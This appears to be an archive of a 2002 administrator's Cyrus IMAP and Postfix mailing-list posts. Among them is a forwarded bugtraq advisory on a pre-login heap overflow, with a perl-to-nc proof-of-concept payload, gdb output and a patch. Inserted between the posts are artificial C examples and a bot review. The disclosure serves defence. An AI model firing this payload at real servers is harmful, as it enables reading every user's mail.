pop login failure not logged to syslog
Hello,

I've got a few Linux systems running Cyrus IMAP 2.1.11 source compiles and a few running Henrique de Moraes Holschuh's Debian sid packages. I'm using sasldb2 (Cyrus SASL 2.1.9) for authentication.

I notice when my users supply the wrong password to imapd, messages are written to syslog like:

    badlogin: localhost[127.0.0.1] plaintext steve SASL(-13): authentication failure: checkpass failed

When authentication fails with pop3d nothing is written to syslog, and I'm trying to work out why. I'm no programmer but I had a look at cyrus-imapd-2.1.11/imap/pop3d.c. Here is what I found: lines 1130-1133 read something like "if reply returns true, log badlogin to syslog":

    1130    if (reply) {
    1131        syslog(LOG_NOTICE, "badlogin: %s plaintext %s %s",
    1132               popd_clienthost, popd_userid, reply);
    1133    }

If I make this read:

    1130    if (!(reply)) {
    1131        syslog(LOG_NOTICE, "badlogin: %s plaintext %s %s",
    1132               popd_clienthost, popd_userid, reply);
    1133    }

pop login failures are now logged to syslog:

    Dec 5 23:47:46 dustpuppy pop3d[4572]: badlogin: [127.0.0.1] plaintext steve (null)

I'm guessing (null) means reply was empty / not true? Why might I be getting this? What other information might I supply you to help track down my fault?

With Thanks,
Steve.
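As an added example (not from the post and not Cyrus code), a small parser for the two "badlogin:" syslog record formats quoted above, run over constructed sample lines so that failures can be counted per user; the host name, pids and the successful-login line are made up.

```c
/* Added example, not Cyrus code: parse the "badlogin:" records that imapd
 * and pop3d write to syslog and count failures per user. Sample lines are
 * constructed from the two formats quoted in the post above. */
#include <stdio.h>
#include <string.h>

struct badlogin {
    char daemon[16];   /* "imapd" or "pop3d" */
    char host[64];     /* "localhost[127.0.0.1]" or "[127.0.0.1]" */
    char mech[16];     /* "plaintext" */
    char user[64];
    char reason[128];  /* trailing text; "(null)" when the daemon had none */
};

/* Constructed sample log; the third line is a successful login and must be ignored. */
static const char *const SAMPLE_LOG[] = {
    "Dec 5 23:40:01 dustpuppy imapd[4501]: badlogin: localhost[127.0.0.1] "
    "plaintext steve SASL(-13): authentication failure: checkpass failed",
    "Dec 5 23:47:46 dustpuppy pop3d[4572]: badlogin: [127.0.0.1] plaintext steve (null)",
    "Dec 5 23:48:02 dustpuppy imapd[4503]: login: localhost[127.0.0.1] steve plaintext",
};
#define SAMPLE_LOG_LEN (sizeof SAMPLE_LOG / sizeof SAMPLE_LOG[0])

/* Returns 1 and fills *out when line is a badlogin record, otherwise 0.
 * Layout: "<mon> <day> <time> <host> <daemon>[<pid>]: badlogin: <client> <mech> <user> <reason...>" */
int parse_badlogin(const char *line, struct badlogin *out)
{
    const char *q;
    size_t n;
    if (sscanf(line, "%*s %*s %*s %*s %15[^[][%*d]: badlogin: %63s %15s %63s",
               out->daemon, out->host, out->mech, out->user) != 4)
        return 0;
    /* The reason is whatever follows the third token after "badlogin:". */
    q = strstr(line, "badlogin:") + strlen("badlogin:");
    for (int i = 0; i < 3; i++) {
        q += strspn(q, " ");
        q += strcspn(q, " ");
    }
    q += strspn(q, " ");
    snprintf(out->reason, sizeof out->reason, "%s", q);
    n = strlen(out->reason);
    while (n > 0 && (out->reason[n - 1] == '\n' || out->reason[n - 1] == '\r'))
        out->reason[--n] = '\0';
    return 1;
}

/* Number of badlogin records for one user across a batch of log lines. */
int count_user_failures(const char *const *lines, size_t count, const char *user)
{
    struct badlogin b;
    int failures = 0;
    for (size_t i = 0; i < count; i++)
        if (parse_badlogin(lines[i], &b) && strcmp(b.user, user) == 0)
            failures++;
    return failures;
}

int main(void)
{
    printf("failed logins for steve: %d\n",
           count_user_failures(SAMPLE_LOG, SAMPLE_LOG_LEN, "steve"));
    return 0;
}
```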
Fwd: pre-login buffer overflow in Cyrus IMAP server
Hello,

The message below is forwarded from bugtraq. I've not seen any discussion of this; is an official fix available? The "semi-exploit" shown does indeed segfault imapd processes on my Debian (sid) boxes.

Steve.

-- Forwarded Message --

Subject: pre-login buffer overflow in Cyrus IMAP server
Date: Mon, 2 Dec 2002 19:56:06 +0200
From: Timo Sirainen <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]

problem
---

Cyrus IMAP server has a remotely exploitable pre-login buffer overflow. I checked versions 1.4 (oldest in web page) and 2.1.10 which both had it, so apparently all versions are affected.

Problem is that literal lengths aren't verified to be in any reasonable range. The length + 2 is then malloc()ed and later written into. So given length of 2^32-1, we get malloc(1) call but ability to write 2^32-1 bytes there.

Note that you don't have to log in before exploiting this, and since Cyrus runs everything under one UID, it's possible to read every user's mail in the system.

I verified that this is exploitable with GLIBC 2.3.1. Probably possible with older glibcs as well although they had somewhat different malloc() code. No idea about other libcs, BSD ones look safe. There could be of course other ways to exploit it than just malloc headers.

(BTW. Why is it that glibc's malloc implementation is almost begging to be exploited? I don't think it would be that difficult to create safer implementation with internal structures in separate memory pages, possibly even separated with non-writable page(s) between. Could even be faster because of better CPU cache utilization, and maybe made to take less memory.)

There's several other malloc/integer related problems where it's possible to read over 2GB strings from clients into memory accessing it with signed integers, finally wrapping into -2^31. That's probably not too bad since it can work only with >2GB process limits (only 64bit architectures I'd think) and even then it would quite likely access only unmapped memory.

Authors were first contacted 30. October, I think it's way past the fix time.
semi-exploit
---

perl -e 'print "x login {4294967295}\r\n\xf0\xef\xff\xbf\x90\xef\xff\xbf\xfc\xff\xff\xff\xfc\xff\xff \xff";'|nc localhost imap2

The first 4 bytes specify the address where you want to write to in memory and the next 4 bytes is the data to be written there (must be a readable memory address). Rest of the bytes are overwriting prev_size and size in malloc header. The above values work with cyrus21 package in Debian unstable/x86.

gdb verifies that the call was successful:

Program received signal SIGSEGV, Segmentation fault.
0xbfffef90 in ?? ()
(gdb) bt
#0 0xbfffef90 in ?? ()
#1 0x400233e9 in prop_dispose () from /usr/lib/libsasl2.so.2
#2 0x4002ae1a in sasl_setpass () from /usr/lib/libsasl2.so.2
#3 0x40026cd2 in sasl_dispose () from /usr/lib/libsasl2.so.2

Shouldn't be too hard to come up with a real exploit from there on. You also need to make one "x logout\n" connection first to trigger the exploit (Cyrus reuses the processes).

fix
---

Apply the included patch and set some reasonable ulimits to make sure the other integer overflows won't hit you in future.

diff -ru cyrus-imapd-2.1.10-old/imap/imapparse.c cyrus-imapd-2.1.10/imap/imapparse.c --- cyrus-imapd-2.1.10-old/imap/imapparse.c2002-06-24 21:58:41.0 +0300 +++ cyrus-imapd-2.1.10/imap/imapparse.c2002-11-29 00:20:44.0 +0200 @@ -97,7 +97,7 @@ struct buf *buf, int type) { int c; -int i; +unsigned int i; unsigned int len = 0; int sawdigit = 0; int isnowait; @@ -228,6 +228,16 @@ if (c != EOF) prot_ungetc(c, pin); return EOF; } + if (len > 65536) { + if (isnowait) { + for (i = 0; i < len; i++) + c = prot_getc(pin); + } + prot_printf(pout, "* BAD Literal too large\r\n"); + prot_flush(pout); + if (c != EOF) prot_ungetc(c, pin); + return EOF; + } if (len >= buf->alloc) { buf->alloc = len+1; buf->s = xrealloc(buf->s, buf->alloc+1); ---
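Review bot: in the second hunk the `isnowait` drain loop `for (i = 0; i < len; i++) c = prot_getc(pin);` keeps calling `prot_getc` after it has returned EOF, so a peer that announces a huge literal and then disconnects costs up to `len` (anything above 65536, potentially 2^32-1) wasted reads before the `* BAD Literal too large` reply goes out; break out of the loop on EOF. Also, the `len > 65536` test runs only after `len` has been fully accumulated and nothing in the hunk guards that accumulation, so the cap should be applied per digit (reject as soon as the running value would exceed it) so that `unsigned int len` cannot wrap back below 65536 and slip past this check; the bare 65536 would also read better as a named constant. The `int i` to `unsigned int i` change in the first hunk is right, since `len` is `unsigned int` and the new loop compares `i < len`.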
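The report describes the flaw as a literal length that is never range-checked before it sizes a malloc. As an added illustration, not Cyrus code and not the patch above, here is how a hardened literal-length parser rejects both an oversized value and a digit string that would wrap the unsigned accumulator; the 65536 cap mirrors the patch, and the function and constant names are my own.

```c
/* Added example, not Cyrus code and not the patch from the report: parse
 * the length of an IMAP literal ("{N}" or "{N+}") so that the value can
 * neither exceed a fixed cap nor wrap the unsigned accumulator. */
#include <stdio.h>

#define MAX_LITERAL 65536u   /* same cap the report's patch uses */

enum lit_result { LIT_OK = 0, LIT_SYNTAX = -1, LIT_TOO_LARGE = -2 };

/* s points at the '{' that opens the literal and must end with "}\r\n".
 * On LIT_OK, *len is the announced length and *nowait is 1 for "{N+}".
 * LIT_TOO_LARGE is returned as soon as the running value would pass
 * MAX_LITERAL, so a long digit string is refused before it can wrap.
 * Because the result is at most MAX_LITERAL, a later allocation of
 * len + 2 bytes for the body cannot overflow either. */
enum lit_result parse_literal_len(const char *s, unsigned int *len, int *nowait)
{
    unsigned int n = 0;
    int sawdigit = 0;

    if (*s++ != '{') return LIT_SYNTAX;
    while (*s >= '0' && *s <= '9') {
        unsigned int d = (unsigned int)(*s - '0');
        /* n * 10 + d <= MAX_LITERAL  <=>  n <= (MAX_LITERAL - d) / 10 */
        if (n > (MAX_LITERAL - d) / 10) return LIT_TOO_LARGE;
        n = n * 10 + d;
        sawdigit = 1;
        s++;
    }
    if (!sawdigit) return LIT_SYNTAX;
    *nowait = 0;
    if (*s == '+') { *nowait = 1; s++; }
    if (s[0] != '}' || s[1] != '\r' || s[2] != '\n') return LIT_SYNTAX;
    *len = n;
    return LIT_OK;
}

int main(void)
{
    /* Constructed inputs; the last one is the length quoted in the report. */
    const char *samples[] = { "{123}\r\n", "{65536+}\r\n", "{65537}\r\n", "{4294967295}\r\n" };
    for (int i = 0; i < 4; i++) {
        unsigned int len = 0;
        int nowait = 0;
        int rc = parse_literal_len(samples[i], &len, &nowait);
        printf("sample %d: result %d len %u nowait %d\n", i, rc, len, nowait);
    }
    return 0;
}
```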
Re: removing banners from cyrus
Changing pop3d.c will only change the "+OK %s Cyrus POP3 v2.0.15 server ready" banner. If you want to change the imap banner, to the best of my knowledge you have to change (in imapd.c) the "OK %s Cyrus IMAP4 %s server ready\r\n" line (same as pop3d.c), the section containing the imap id (as per RFC2971):

    prot_printf(imapd_out, "* ID ("
                "\"name\" \"Cyrus\""
                " \"version\" \"%s\""
                " \"vendor\" \"Project Cyrus\""
                " \"support-url\" \"http://asg.web.cmu.edu/cyrus\"",
                CYRUS_VERSION);

and there are a few entries specific to Netscape.

Steve.

On Tuesday 02 April 2002 15:39, you wrote:
> This will take care of both the IMAP and POP3 banners? Nothing needs to be
> done to say .. imapd.c
>
> Thanks again
>
> At 11:01 AM 4/2/2002 +0100, Steve Wright wrote:
> > The "+OK %s Cyrus POP3 v2.0.15 server ready" banner can be changed by
> > editing line 323 in /src/cyrus-imapd-2.0.15/imap/pop3d.c
Re: removing banners from cyrus
The "+OK %s Cyrus POP3 v2.0.15 server ready" banner can be changed by editing line 323 in /src/cyrus-imapd-2.0.15/imap/pop3d.c

On Tuesday 02 April 2002 10:06, you wrote:
> > What is the procedure for removing the banners from Cyrus? I am sure
> > this involves editing a source file and recompiling; I just haven't
> > seen this documented anywhere. If someone could advise. Thanks
>
> Banners Cyrus ??? Cyrus doesn't have banners ? Does it ?
>
> Are you sure it is not your MTA which is probably where banners
> should be removed anyway ?
Re: Postfix & cyrus
cyrdeliver does not exist. The documentation was written for an earlier version of Cyrus.

    cyrus     unix  -       n       n       -       -       pipe
      flags=R user=cyrus argv=/usr/cyrus/bin/deliver -e -m ${extension} ${user}

is working fine on one of my servers. Strangely the default master.cf that accompanies Postfix 1.1.3 (latest stable) is also incorrect. :(

Steve.

On Monday 04 March 2002 13:28, you wrote:
> I saw in a documentation ;-) how to use postfix to transport mail:
> insert in /etc/postfix/master.cf the following line:
> cyrus unix - n n - - pipe
> flags=R user=cyrus argv=/usr/sbin/cyrdeliver -e -m ${extension}
> ${user}
>
> But I can't locate cyrdeliver.
Re: howto change postfix / cyrus quota message
I am reading this now. These look excellent; this and RFC 1893 make these codes very clear and easy to understand. You have my thanks :)

Steve.

On Friday 22 February 2002 14:38, you wrote:
> > From: Steve Wright <[EMAIL PROTECTED]>
> > Date: Thu, 21 Feb 2002 16:51:12 +
> > Cc: <[EMAIL PROTECTED]>
> >
> > Lawrence,
> >
> > This was working as 4.2.2 I have changed it to 5.2.2 & it is still
> > working. What difference should I expect to see or problems might I
> > experience with this as 4.2.2
> > I am not familiar with what these codes represent, I would be grateful
> > if you will point to documentation for them (eg rfc, website, etc).
>
> It's unlikely that 4.2.2 will break anything, but it's not following
> the standards. See RFC 2034.
>
> Larry
webmail
Can someone recommend me a good webmail package? At some point in the near future I will need to set up webmail on our production servers, and after seeing the security SquirrelMail offers I think it will be very hard to make a case for it. I know of IMP, Mulberry and SilkyMail but have not used any of these packages. What I would really like is people who have webmail running to tell me what they feel the pros and cons are with the packages they are using.

With Thanks,
Steve.
Re: howto change postfix / cyrus quota message
Lawrence,

This was working as 4.2.2. I have changed it to 5.2.2 and it is still working. What difference should I expect to see, or problems might I experience with this as 4.2.2?

I am not familiar with what these codes represent; I would be grateful if you will point to documentation for them (eg RFC, website, etc).

With Thanks
Steve.

On Thursday 21 February 2002 16:30, you wrote:
> > From: Steve Wright <[EMAIL PROTECTED]>
> > Date: Thu, 21 Feb 2002 12:57:44 +
> > Cc: <[EMAIL PROTECTED]>
> >
> > How I changed the quota message;
> >
> > To change the message cyrus rejects over quota mail with I modified
> > /usr/local/src/cyrus-imapd-2.0.16/imap/lmtpengine.c (line 152)
> >
> > The lines 151 & 152 now read;
> > 151    case IMAP_QUOTA_EXCEEDED:
> > 152        return "550 4.2.2 Over quota";
>
> You need to make that
>
> return "550 5.2.2 Over quota";
>
> Larry
quota message
I'm getting this message generated by Postfix when Cyrus refuses to accept mail because the Cyrus user is over quota. I need to remove the reference to the lmtp socket; can anyone tell me how??

    This is the Postfix program at host mail.domain.co.uk

    I'm sorry to have to inform you that the message returned below could
    not be delivered to one or more destinations.

    For further assistance, please send mail to

    If you do so, please include this problem report. You can delete your
    own text from the message returned below.

    The Postfix program

    <[EMAIL PROTECTED]>: host /var/spool/postfix/public/lmtp[/var/spool/postfix/public/lmtp] said: 550 4.2.2 Over quota

Thanks,
Steve.
Re: duplicate_prune - what does this mean
You would have a problem if it wasn't there :)

Steve

On Thursday 21 February 2002 14:16, you wrote:
> So it's absolutely ok! Isn't it?
>
> Manuel
Re: duplicate_prune - what does this mean
Cyrus keeps a database to prevent duplicate emails. The ctl_deliver command removes old entries that are no longer needed from this database. I believe the command is run about every 20 minutes and will delete any entries in the database over 3 days old.

Steve.

On Thursday 21 February 2002 13:34, you wrote:
> Whenever I start the cyrus-imapd I get the following two lines for
> every letter from a-z in my logfile:
>
> Feb 21 14:09:03 he0 ctl_deliver[36825]: creating
> /usr/local/etc/imap/deliverdb/deliver-z.db
> Feb 21 14:09:03 he0 ctl_deliver[36825]: duplicate_prune:
> /usr/local/etc/imap/deliverdb/deliver-z.db: purged 0 out of 0 entries
>
> Can anyone tell me what this means?
>
> Thanks,
> Manuel
Re: howto change postfix / cyrus quota message
Andrei,

Not sure if I understand your question. The behaviour will change, but only because we change the response code Cyrus gives. My understanding of this is below (and please tell me if I'm wrong): as I understand it, over-quota mail is never placed in the queue by Cyrus. It is only placed in the queue by Postfix. But if I have understood you correctly you want to know only that mail will bounce immediately, and the answer is yes.

My understanding:

    Incoming mail --> Postfix --> Cyrus --> Outgoing

Incoming mail being SMTP; outgoing mail being a client using POP3 / IMAP / etc.

In a 'normal' compile of Cyrus, mail comes into Postfix, which accepts the mail because the recipient is in whatever list of valid users it uses; the mail is now in Postfix's spool. Postfix now attempts to deliver the mail to its destination, which for local mail will be Cyrus; it does this either via deliver or LMTP. Cyrus checks if the user is valid, then it checks the quota; if the user is over quota it responds with a temporary error code and an English message saying "over quota". The message is still in Postfix's spool and can be seen with mailq. Postfix will attempt to deliver the mail for the next 5 days (default); it will also continue to accept mail for the user.

This patch modifies the error code Cyrus returns to Postfix, causing Postfix not to continue attempting to deliver mail, but to bounce the mail as undeliverable back to the sender (including the "over quota" text Cyrus passed it).

Steve.

On Thursday 21 February 2002 13:05, you wrote:
> > The lines 151 & 152 now read;
> > 151    case IMAP_QUOTA_EXCEEDED:
> > 152        return "550 4.2.2 Over quota";
>
> It will change the message, but will it change cyrus' behavior also?
> I mean not to place overquoted message to the queue, and reject it
> immediately ?
>
>
> Andrei V. Loukinykh , Evpatoria Ukrtelecom ISP, +380 6569 29376
> ~~~
> "UNIX is like a vigvam - no Windows, no Gates and an Apache inside"
Re: howto change postfix / cyrus quota message
How I changed the quota message:

To change the message Cyrus rejects over-quota mail with, I modified /usr/local/src/cyrus-imapd-2.0.16/imap/lmtpengine.c (line 152). Lines 151 & 152 now read:

    151    case IMAP_QUOTA_EXCEEDED:
    152        return "550 4.2.2 Over quota";

After recompiling Cyrus the only binary files that will have changed are deliver and lmtpd; these files are located at:

    /usr/local/src/cyrus-imapd-2.0.16/imap/deliver
    /usr/local/src/cyrus-imapd-2.0.16/imap/lmtpd

Back up /usr/cyrus/bin/deliver and /usr/cyrus/bin/lmtpd. Stop Cyrus and replace the two files with the new copies. Restart Cyrus and the message will have changed.

I hope this helps.

Steve.

On Thursday 21 February 2002 12:45, you wrote:
> Hello
>
> > I have therefore (from information I found in the mailing list archives)
> > altered cyrus to no longer issue a temporary error, cyrus will now issue
> > 550 when the user is over quota.
>
> Please, could u tell me how to do that, or direct me to that message ,
> where u found the answer . I couldnt find it in the mailing list.
>
> Thanks
> Regards
>
>
> Andrei V. Loukinykh , Evpatoria Ukrtelecom ISP, +380 6569 29376
> ~~~
> "UNIX is like a vigvam - no Windows, no Gates and an Apache inside"
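Larry's correction in the thread (5.2.2 rather than 4.2.2 behind a 550) follows the RFC 2034 rule that the class digit of the enhanced status code must match the class of the three-digit reply code, and Steve's explanation of queue-versus-bounce behaviour turns on that reply code. As an added example, not Cyrus or Postfix code, here is a checker that parses an LMTP reply like the one above and flags the mismatch; the names and the sample replies are constructed.

```c
/* Added example, not Cyrus or Postfix code: check that an LMTP/SMTP reply
 * such as "550 4.2.2 Over quota" follows RFC 2034, which requires the class
 * digit of the enhanced status code to match the class of the reply code. */
#include <stdio.h>
#include <string.h>

struct lmtp_reply {
    int code;                  /* three-digit reply code, e.g. 550 */
    int cls, subject, detail;  /* enhanced status code class.subject.detail */
    char text[128];            /* human-readable text after the codes */
};

enum verdict { REPLY_UNPARSED = -1, REPLY_MISMATCH = 0, REPLY_CONSISTENT = 1 };

/* Fill *out from reply and report whether reply code and enhanced code agree. */
enum verdict check_reply(const char *reply, struct lmtp_reply *out)
{
    int used = 0;
    if (sscanf(reply, "%3d %d.%d.%d %n", &out->code, &out->cls,
               &out->subject, &out->detail, &used) != 4)
        return REPLY_UNPARSED;               /* no enhanced status code present */
    if (out->code < 200 || out->code > 599) return REPLY_UNPARSED;
    if (out->cls != 2 && out->cls != 4 && out->cls != 5) return REPLY_UNPARSED;
    snprintf(out->text, sizeof out->text, "%s", reply + used);
    return out->code / 100 == out->cls ? REPLY_CONSISTENT : REPLY_MISMATCH;
}

/* The MTA's queue decision is driven by the reply code class alone:
 * 4yz keeps the message queued for retry, 5yz bounces it. */
const char *queue_action(int code)
{
    if (code >= 500) return "bounce";
    if (code >= 400) return "retry";
    return "delivered";
}

int main(void)
{
    /* Constructed replies: the one from the post, Larry's correction, a
     * transient form of the same condition, and one with no enhanced code. */
    const char *samples[] = { "550 4.2.2 Over quota", "550 5.2.2 Over quota",
                              "452 4.2.2 Over quota", "550 Over quota" };
    for (int i = 0; i < 4; i++) {
        struct lmtp_reply r;
        enum verdict v = check_reply(samples[i], &r);
        printf("%-22s -> verdict %d", samples[i], (int)v);
        if (v != REPLY_UNPARSED) printf(" (%s)", queue_action(r.code));
        printf("\n");
    }
    return 0;
}
```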
postfix / cyrus quota message
First, thank you to everyone who emailed me with large companies / organizations that are running Cyrus.

Next, I have hit a snag and am not sure if this is caused by some configuration option I have not correctly set.

I have Postfix delivering to Cyrus via LMTP; this works great. When a user becomes over quota (set via cyradm), Cyrus will not accept mail for that user and a temporary error will be issued to Postfix; Postfix will then keep mail in its spool until it can be delivered. This is not desired: I want mail for users over quota to be rejected! I have therefore (from information I found in the mailing list archives) altered Cyrus to no longer issue a temporary error; Cyrus will now issue 550 when the user is over quota. This works and is good; however the bounce message returned to the message sender is:

    postfix etc,etc When talking to lmtp:/pathtosocket/socketname the etc,etc said "User over quota" etc,etc

This is my problem: I have no desire for people to know the location of the lmtp socket nor see any information about it. Is there a way to stop this?? I would like the message sender to get a message something like:

    postfix etc,etc The message could not be delivered as the mailbox is full, please try later.

Is there possibly another code instead of 550 I should not accept mail with??

With Thanks
Steve.
who uses cyrus ?
Hi,

We are evaluating Cyrus IMAP and Sieve for our production servers, and I would be grateful if someone could name maybe a few large companies / organizations that are also running it.

Thanks
Steve.
Problem with sieve
Hi

I am running Cyrus and have had for quite some time with no problems. I would now like to use Sieve with websieve as a GUI. I have installed websieve but can not login. Websieve returns:

    System Error: IMAP::Sieve [ Login incorrect while connecting to localhost ]: NO ("SASL" "no mechanism available") "Authentication error"

I have RTFM'd and searched Google; however the only relevant information I can find is from the Cyrus docs (that come with Cyrus) telling me if I telnet to the sieve port I should be greeted with:

    Connected to cyrus-dev.andrew.cmu.edu.
    Escape character is '^]'.
    "CMU Experimental Sieved version 0.99"
    "SASL={GSSAPI, ANONYMOUS, PLAIN, KERBEROS_V4}"

This is not happening; I am greeted with:

    Connected to localhost.
    Escape character is '^]'.
    "IMPLEMENTATION" "Cyrus timsieved v1.0.0"
    "SIEVE" "fileinto reject envelope vacation imapflags notify subaddress regex"
    OK

Providing no SASL information?? Is this correct??? Is there any way I can login / authenticate to Sieve via telnet to prove if the problem is with Cyrus or something I have not done with websieve??

With Thanks,
Steve.
Re: create users without cryadm
Doesn't matter, I've just seen how to do this using the Perl modules.

Steve

On Thursday 14 February 2002 13:39, you wrote:
> Hi
>
> I've just setup cyrus on another server & I need to create users from the
> command line (ie without using cyradm), can anyone tell me how I can do
> this (or point me to a webpage).
>
> Thanks
> Steve.
create users without cryadm
Hi

I've just set up Cyrus on another server and I need to create users from the command line (ie without using cyradm). Can anyone tell me how I can do this (or point me to a webpage)?

Thanks
Steve.
sasldb realm change ?
I've just changed the servername for Cyrus IMAP, and I note doing this changes the realm Cyrus checks in sasldb. Is there a way to change the realm a user in the sasldb belongs to (without resetting the user's password)??

Thanks,
Steve
problem compiling sasl with pam
Hi,

I'm setting up Cyrus to authenticate to an LDAP database; I know from reading the docs to compile SASL to use PAM. Unfortunately I can see ./configure checking for pam_start and PAM support, then returning "no" on both ... What files is configure checking for? (PAM is installed.) And where are they usually located?

I'm running Debian 2.2rc3, compiling cyrus-sasl-1.5.24.

Thanks.

-- 
Steve Wright
Systems Administrator
ICQ: 123189056
Re: chroot cyrus
Cyrus will be installed (eventually) on our ISP mail server. The current setup is such that Apache and BIND run chroot; therefore if compromised the attacker will only be allowed access to their separate directory structures (e.g. BIND compromised, /chroot/dns/ appears to be root, only subdirectories thereof are at risk). Upon installation I wish the same to be true of Cyrus.

The facilities I require from Cyrus are POP3, IMAP and IMAP via SSL. Web based mail will be installed when the new system is operational. To deviate slightly, has anyone had experience of SquirrelMail (www.squirrelmail.org)? It appears to have a cleaner interface than IMP and I will need to evaluate both products.

I hope you may be able to provide me with help.

Steve Wright
Systems Administrator

Seva Adari wrote:

> Without knowing the reasons for why your are trying to chroot
> cyrus, it is difficult to comment. I am not quite sure if chrooting
> is relevant or is necessary at all for cyrus-imap!
>
> From a security point of view cyrus is well designed to stay in
> private ip space and serve the users. What you may want to do
> is to allow interaction to cyrus via web interface, using for example
> imp from www.horde.org or similar other applications.
> __
> Seva
>
> Steve Wright wrote:
>
> > This is probably not a very good question, but I'm new to cyrus.
> >
> > I want to setup cyrus running in a chroot environment, am I correct in
> > thinking all I need to do is move the binaries, libraries & config files
> > inside a directory structure then "chroot /[dir.structure] master &" ?
> > Or like postfix is there an option to run its child process(s) chroot ?
> >
> > Thanks
> > Steve Wright
chroot cyrus
This is probably not a very good question, but I'm new to Cyrus.

I want to set up Cyrus running in a chroot environment. Am I correct in thinking all I need to do is move the binaries, libraries and config files inside a directory structure, then "chroot /[dir.structure] master &"? Or, like Postfix, is there an option to run its child process(es) chroot?

Thanks
Steve Wright